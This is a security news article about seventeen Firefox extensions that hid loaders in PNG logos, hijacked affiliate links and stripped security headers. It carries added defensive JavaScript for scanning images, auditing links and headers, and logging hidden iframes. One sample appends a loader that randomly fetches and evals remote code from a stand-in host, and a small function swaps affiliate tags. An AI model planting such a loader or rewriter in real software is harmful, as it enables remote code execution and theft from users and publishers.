Monday, January 19, 2026

Firefox Extensions Caught Hiding Malware in Plain Sight

  • Seventeen Firefox extensions were found to contain hidden malware and backdoors
  • The add-ons hijacked affiliate links, tracked browsing, and enabled ad fraud
  • A loader hidden inside image files fetched the main payload only about one time in ten
  • Mozilla removed the extensions and urges users to uninstall them and secure their accounts

Security researchers have uncovered a troubling campaign targeting Firefox users, revealing that a cluster of popular browser add-ons were quietly doing far more than they claimed.

Instead of offering simple utilities like translation tools, weather updates, or VPN services, these extensions were laced with hidden backdoors, tracking systems, and ad fraud capabilities.

The discovery was made by Koi Security, which tracked the activity under the name “GhostPoster.”

According to their findings, at least 17 Firefox extensions were involved, collectively downloaded more than 50,000 times before being taken down.

What makes this case particularly concerning is how long these add-ons operated unnoticed, despite being hosted on Mozilla’s official add-ons store.

These were not obscure or obviously suspicious tools. Many appeared polished, offered familiar branding, and mimicked legitimate services users rely on daily. That familiarity is precisely what allowed them to spread quietly.


How the Extensions Worked Behind the Scenes

The technical approach used in this campaign shows careful planning and a strong understanding of how to evade detection. Several of the malicious extensions hid JavaScript inside their own image files, specifically the PNG logos bundled with the add-on.

To a casual review or an automated scan, these files looked like ordinary images. In reality, they carried a loader: instructions telling the extension when, and from where, to fetch additional malicious code.

To reduce the chance of being flagged, the extensions downloaded their main payload only about 10 percent of the time. A user or reviewer could therefore run the extension for weeks without seeing any obvious red flag, while the background abuse continued on the runs where the payload did load.
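The simplest place to park a loader in a PNG is after the IEND chunk (decoders stop reading there, so the image still renders) or inside a free-form text chunk. The scanner below, an added example that is not code from Koi Security, Mozilla or the extensions themselves, walks the chunk table of an image taken from an extension package and reports both. The sample PNGs, the `stage2.invalid` URL and the one-in-ten gate in the appended string are constructed for the demonstration; CRCs are not verified.

```javascript
// Added example (not Koi Security's or Mozilla's code): walk the chunk table of
// a PNG shipped inside an extension and report anything that is not plain
// image data. Decoders stop at IEND, so bytes appended after it never affect
// rendering, which makes that tail (and the free-form text chunks) a handy
// place to park a loader string. CRCs are not verified here.
const PNG_SIGNATURE = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const STANDARD_CHUNKS = new Set([
  'IHDR', 'PLTE', 'IDAT', 'IEND', 'tRNS', 'cHRM', 'gAMA', 'iCCP', 'sBIT', 'sRGB',
  'tEXt', 'zTXt', 'iTXt', 'bKGD', 'hIST', 'pHYs', 'sPLT', 'tIME', 'eXIf',
]);
// Crude markers for "this text is a script or a loader"; not a JS parser.
const SCRIPT_MARKERS = [/\bfetch\s*\(/, /\beval\s*\(/, /\bFunction\s*\(/, /\batob\s*\(/, /https?:\/\//i];

function looksLikeScript(text) {
  return SCRIPT_MARKERS.some((re) => re.test(text));
}

function scanPng(buf) {
  const findings = [];
  if (buf.length < 8 || !buf.subarray(0, 8).equals(PNG_SIGNATURE)) {
    return { valid: false, trailingBytes: 0, findings: ['not a PNG: bad signature'] };
  }
  let offset = 8;
  let sawIend = false;
  while (offset + 12 <= buf.length) {          // 4 length + 4 type + 4 CRC minimum
    const length = buf.readUInt32BE(offset);
    const type = buf.toString('latin1', offset + 4, offset + 8);
    const dataStart = offset + 8;
    const dataEnd = dataStart + length;
    if (dataEnd + 4 > buf.length) {
      findings.push(`truncated ${type} chunk at offset ${offset}`);
      return { valid: false, trailingBytes: 0, findings };
    }
    const data = buf.subarray(dataStart, dataEnd);
    if (type === 'tEXt' || type === 'zTXt' || type === 'iTXt') {
      // Text chunks are legitimate metadata, but nothing stops a loader living there.
      const text = data.toString('latin1');
      if (looksLikeScript(text)) findings.push(`${type} chunk holds script-like text: ${text.slice(0, 40)}`);
    } else if (!STANDARD_CHUNKS.has(type)) {
      findings.push(`non-standard chunk ${type} (${length} bytes)`);
    }
    offset = dataEnd + 4;                      // step over the CRC
    if (type === 'IEND') { sawIend = true; break; }
  }
  if (!sawIend) findings.push('no IEND chunk');
  const trailingBytes = buf.length - offset;
  if (trailingBytes > 0) {
    const tail = buf.subarray(offset).toString('latin1');
    findings.push(`${trailingBytes} bytes after IEND${looksLikeScript(tail) ? ' (script-like)' : ''}`);
  }
  return { valid: sawIend, trailingBytes, findings };
}

// Build a chunk with a zeroed CRC; fine for a scanner that does not check CRCs.
function chunk(type, data) {
  const len = Buffer.alloc(4);
  len.writeUInt32BE(data.length, 0);
  return Buffer.concat([len, Buffer.from(type, 'latin1'), data, Buffer.alloc(4)]);
}

// Constructed samples: a minimal 1x1 RGBA PNG, and the same file with a
// loader string appended. The URL and the one-in-ten gate are illustrative.
const IHDR_1X1_RGBA = Buffer.from([0, 0, 0, 1, 0, 0, 0, 1, 8, 6, 0, 0, 0]);
const cleanPng = Buffer.concat([PNG_SIGNATURE, chunk('IHDR', IHDR_1X1_RGBA), chunk('IEND', Buffer.alloc(0))]);
const loader = Buffer.from("if(Math.random()<0.1){fetch('https://stage2.invalid/p.js').then(r=>r.text()).then(eval)}", 'latin1');
const lacedPng = Buffer.concat([cleanPng, loader]);

console.log(scanPng(cleanPng).findings);   // no findings
console.log(scanPng(lacedPng).findings);   // one finding: "<N> bytes after IEND (script-like)"
```

To use it on a real add-on, unzip the `.xpi` and run `scanPng(fs.readFileSync(path))` over every `.png` in it; any trailing bytes at all deserve a look, since a correctly written image has none.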

Once activated, the downloaded payload could perform a wide range of actions. The most consistent behavior involved hijacking affiliate links on major e-commerce platforms.

When a user clicked a product link, the extension silently rewrote it so that commissions were redirected to the attackers instead of legitimate publishers or creators.
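The rewrite itself is mundane: the link's affiliate identifier is swapped for the attacker's before navigation happens. The added example below (not code from the campaign, Koi Security or Mozilla) shows that class of rewrite as a stand-in, then the check a publisher or analyst can run against it: record the `href` at click time and diff it against the URL the browser finally loads. The `shop.example` URLs, the `honestblog-20`/`ghost-21` tags and the parameter list are constructed; `tag` is the Amazon Associates parameter, the other names are illustrative.

```javascript
// Added example (not Koi Security's or Mozilla's code): detect affiliate
// parameter rewriting by comparing the link a user clicked with the URL the
// browser actually navigated to. The parameter names are illustrative
// (Amazon Associates uses `tag`; the others stand in for similar schemes).
const AFFILIATE_PARAMS = ['tag', 'campid', 'aff_id', 'affiliate'];

// Stand-in for the class of rewrite described in the article: replace the
// publisher's affiliate identifier with the attacker's. Not the real payload.
function swapAffiliateTag(href, attackerTag) {
  const url = new URL(href);
  for (const param of AFFILIATE_PARAMS) {
    if (url.searchParams.has(param)) url.searchParams.set(param, attackerTag);
  }
  return url.toString();
}

// Compare the href recorded at click time with the final navigation URL.
// Returns a list of differences; an empty list means nothing was tampered.
function auditClick(originalHref, finalUrl) {
  const before = new URL(originalHref);
  const after = new URL(finalUrl);
  const changes = [];
  if (before.hostname !== after.hostname) {
    changes.push({ field: 'host', before: before.hostname, after: after.hostname });
  }
  if (before.pathname !== after.pathname) {
    changes.push({ field: 'path', before: before.pathname, after: after.pathname });
  }
  for (const param of AFFILIATE_PARAMS) {
    const was = before.searchParams.get(param);   // null when absent
    const now = after.searchParams.get(param);
    if (was !== now) changes.push({ field: param, before: was, after: now });
  }
  return changes;
}

// Constructed sample: a publisher's link and what a hijacking extension turns it into.
const publisherLink = 'https://shop.example/dp/B000TEST?tag=honestblog-20';
const hijacked = swapAffiliateTag(publisherLink, 'ghost-21');
const report = auditClick(publisherLink, hijacked);
console.log(report);   // [{ field: 'tag', before: 'honestblog-20', after: 'ghost-21' }]
```

In a page you would capture `originalHref` in a `mousedown` listener on anchors and take `finalUrl` from the address bar or a `webNavigation` log after the click completes; a non-empty report on a link you never edited means something in the browser rewrote it.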

In addition to financial manipulation, the extensions injected Google Analytics tracking code into nearly every page the user visited.


This allowed the operators to monitor browsing behavior at scale. Even more concerning, the malware stripped security headers from the HTTP responses of pages the user visited. Browsers honor headers such as Content-Security-Policy and X-Frame-Options to limit which scripts a page may run and whether it may be framed, so removing them in transit leaves the page with fewer defenses, both against injections of the kind described here and against other attacks.
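Header stripping is easy to confirm once you suspect it: fetch the same URL from outside the browser and compare the security headers with what the page saw from inside it. The comparison below is an added example, not code from Koi Security or Mozilla; the header sets are constructed samples of a reference response and of what a header-filtering extension might leave behind.

```javascript
// Added example (not Koi Security's or Mozilla's code): check whether the
// security headers a site actually sends survived the trip through the
// browser. `reference` is the header set captured outside the browser (for
// example with `curl -sI`); `observed` is what the page inside the browser saw.
const SECURITY_HEADERS = [
  'content-security-policy',
  'strict-transport-security',
  'x-frame-options',
  'x-content-type-options',
  'referrer-policy',
  'cross-origin-opener-policy',
];

// Lowercase header names so the comparison is case-insensitive.
function normalise(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) out[name.toLowerCase()] = String(value).trim();
  return out;
}

function compareSecurityHeaders(reference, observed) {
  const ref = normalise(reference);
  const obs = normalise(observed);
  const stripped = [];
  const altered = [];
  for (const name of SECURITY_HEADERS) {
    if (!(name in ref)) continue;              // the site never sent it; nothing to lose
    if (!(name in obs)) stripped.push(name);
    else if (obs[name] !== ref[name]) altered.push({ name, reference: ref[name], observed: obs[name] });
  }
  return { stripped, altered, intact: stripped.length === 0 && altered.length === 0 };
}

// Constructed samples: the server's real response vs. what reached the page.
const referenceHeaders = {
  'Content-Security-Policy': "default-src 'self'; script-src 'self'",
  'Strict-Transport-Security': 'max-age=63072000; includeSubDomains',
  'X-Frame-Options': 'DENY',
  'X-Content-Type-Options': 'nosniff',
  'Content-Type': 'text/html; charset=utf-8',
};
const observedHeaders = {
  'content-type': 'text/html; charset=utf-8',
  'strict-transport-security': 'max-age=63072000; includeSubDomains',
  'content-security-policy': "default-src 'self'; script-src 'self' https:",
};
const verdict = compareSecurityHeaders(referenceHeaders, observedHeaders);
console.log(verdict);
// stripped: x-frame-options, x-content-type-options; altered: content-security-policy
```

For `observed`, a same-origin `fetch()` run from the page's console with the suspect extension enabled and `Object.fromEntries(response.headers)` is usually enough; headers that an extension removed in the browser's network layer show up as stripped, and a loosened policy as altered.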

From Ad Fraud to Bigger Risks Ahead

Beyond affiliate theft and tracking, the extensions could also bypass CAPTCHA systems using several techniques. They injected invisible iframes into web pages, the sort typically used for ad fraud, click fraud, and behavioral tracking.

These iframes were designed to self-delete after about 15 seconds, further reducing the chance of detection.
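A frame that removes itself after 15 seconds defeats a glance at the DOM, but not a ledger that records every frame insertion and removal with timestamps. The code below is an added example (not from Koi Security, Mozilla or the extensions): a classifier for invisible iframes and a ledger that keeps a record of short-lived hidden ones. Frames are plain objects so it runs outside a browser; the `tracker.invalid` and `video.example` samples, the 20-second threshold and the timestamps are constructed.

```javascript
// Added example (not Koi Security's or Mozilla's code): classify an iframe as
// invisible and keep a ledger of how long injected frames lived, so frames that
// self-delete after a few seconds still leave a record. Inputs are plain
// objects; in a page you would feed it from a MutationObserver.
function dim(value) {
  if (value === undefined || value === null || value === '') return NaN;
  return Number(String(value).replace(/px$/, ''));
}

function isHiddenFrame(frame) {
  const w = dim(frame.width);
  const h = dim(frame.height);
  const style = (frame.style || '').toLowerCase().replace(/\s+/g, '');
  if (!Number.isNaN(w) && w <= 1) return true;
  if (!Number.isNaN(h) && h <= 1) return true;
  if (/display:none/.test(style)) return true;
  if (/visibility:hidden/.test(style)) return true;
  if (/opacity:0(?:\.0+)?(?:;|$)/.test(style)) return true;   // opacity 0, not 0.5
  if (/(?:left|top):-\d{3,}/.test(style)) return true;        // parked far off-screen
  return false;
}

class FrameLedger {
  constructor(shortLivedMs = 20000) {
    this.shortLivedMs = shortLivedMs;
    this.open = new Map();   // id -> { id, src, hidden, addedAt }
    this.closed = [];        // completed records, including the suspicious ones
  }
  onAdded(id, frame, now) {
    this.open.set(id, { id, src: frame.src || '', hidden: isHiddenFrame(frame), addedAt: now });
  }
  onRemoved(id, now) {
    const rec = this.open.get(id);
    if (!rec) return null;
    this.open.delete(id);
    const entry = { ...rec, removedAt: now, lifetimeMs: now - rec.addedAt };
    // Hidden and gone again within the window: exactly the pattern described.
    entry.suspicious = entry.hidden && entry.lifetimeMs <= this.shortLivedMs;
    this.closed.push(entry);
    return entry;
  }
}

// Constructed sample: a 0x0 tracking frame that lives 15 s next to a normal embed.
const ledger = new FrameLedger();
const t0 = 1_000_000;
ledger.onAdded('f1', { src: 'https://tracker.invalid/pixel', width: '0', height: '0' }, t0);
ledger.onAdded('f2', { src: 'https://video.example/embed', width: '640', height: '360' }, t0);
const gone = ledger.onRemoved('f1', t0 + 15_000);
console.log(gone);   // suspicious: true, lifetimeMs: 15000
```

In a page, attach a `MutationObserver` to `document.documentElement` with `{ childList: true, subtree: true }`, pass each added or removed `IFRAME` node to `onAdded`/`onRemoved` with `Date.now()`, and key nodes with a counter stored in a `WeakMap`; `ledger.closed` then holds the frames that came and went while you were not looking.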

While researchers did not observe widespread credential theft or banking fraud during this campaign, the infrastructure was clearly capable of supporting more damaging attacks.

Koi Security warned that the same mechanisms could easily be repurposed to harvest passwords, intercept form data, or redirect users to convincing phishing pages that mimic banks or online services.

In other words, what was seen may only represent the most profitable phase of the operation, not its full potential.


Mozilla’s Response and What Users Should Do Now

After the findings were made public, Mozilla investigated the report and confirmed the malicious behavior. All identified extensions were removed from the Firefox Add-ons Marketplace.

Mozilla also stated that its automated detection systems have been updated to better identify similar techniques going forward.

While this response is welcome, it does not fully undo the damage. Any user who installed one of these extensions while it was active may have already been affected. Uninstalling the add-on is necessary, but not always sufficient.

Users are strongly advised to review account activity, especially on e-commerce platforms, reset important passwords, and enable two-factor authentication where possible. It is also a good reminder to audit browser extensions regularly and remove anything that is no longer essential.

This incident reinforces a hard truth about browser security. Even official stores are not immune to abuse, and convenience tools can sometimes come with hidden costs.

Follow TechBSB For More Updates

Emily Parker